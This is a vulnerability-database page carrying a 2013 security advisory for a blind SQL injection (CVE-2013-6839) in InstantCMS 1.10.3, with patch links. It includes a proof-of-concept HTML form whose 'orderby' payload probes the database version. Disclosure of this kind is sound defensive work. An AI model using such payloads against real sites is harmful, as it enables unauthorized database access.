| Reporter | Title | Published | Views | Family All 13 |
|---|---|---|---|---|
| InstantCMS 1.10.3 SQL Injection Vulnerability | 12 Dec 201300:00 | – | zdt | |
| CVE-2013-6839 | 13 Dec 201315:00 | – | cve | |
| CVE-2013-6839 | 13 Dec 201315:00 | – | cvelist | |
| InstantCMS 1.10.3 - Blind SQL Injection | 17 Dec 201300:00 | – | exploitdb | |
| EUVD-2013-6641 | 7 Oct 202500:30 | – | euvd | |
| InstantCMS 1.10.3 - Blind SQL Injection | 17 Dec 201300:00 | – | exploitpack | |
| SQL Injection in InstantCMS | 20 Nov 201300:00 | – | htbridge | |
| CVE-2013-6839 | 13 Dec 201318:07 | – | nvd | |
| InstantCMS 1.10.3 SQL Injection | 12 Dec 201300:00 | – | packetstorm | |
| Sql injection | 13 Dec 201318:07 | – | prion |
Advisory Details:
High-Tech Bridge Security Research Lab discovered blind SQL injection vulnerability in InstantCMS, which can be exploited to perform SQL Injection attacks, alter SQL requests and compromise vulnerable application.
1) SQL Injection in InstantCMS: CVE-2013-6839
The vulnerability exists due to insufficient filtration of "orderby" HTTP POST parameter passed to "/catalog/[id]" URL. A remote unauthenticated attacker can execute arbitrary SQL commands in application's database.
Simple exploit code below uses blind SQL injection exploitation technique, and will display different order of records on the page if MySQL version is 5.*:
<form action="http://[host]/catalog/2" method="post" name="main">
<input type="hidden" name="orderby" value="(-pubdate*(substring(version(),1,1)=5))">
<input type="hidden" name="orderto" value="asc">
<input type="submit" id="btn">
</form>
-----------------------------------------------------------------------------------------------
Solution:
Apply patch for InstantCMS 1.10.3:
http://www.instantcms.ru/download/patch/security_update_for_iCMS_1.10.3_21-11-2013.zip
InstantCMS 1.10.3 downloaded after 21/11/2013 is patched [without version/release modification] and is not vulnerable.
More Information:
http://www.instantcms.ru/novosti/security-update-1-10-3.html
http://trac.instantcms.ru/changeset/1376
# 0day.today [2018-03-09] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation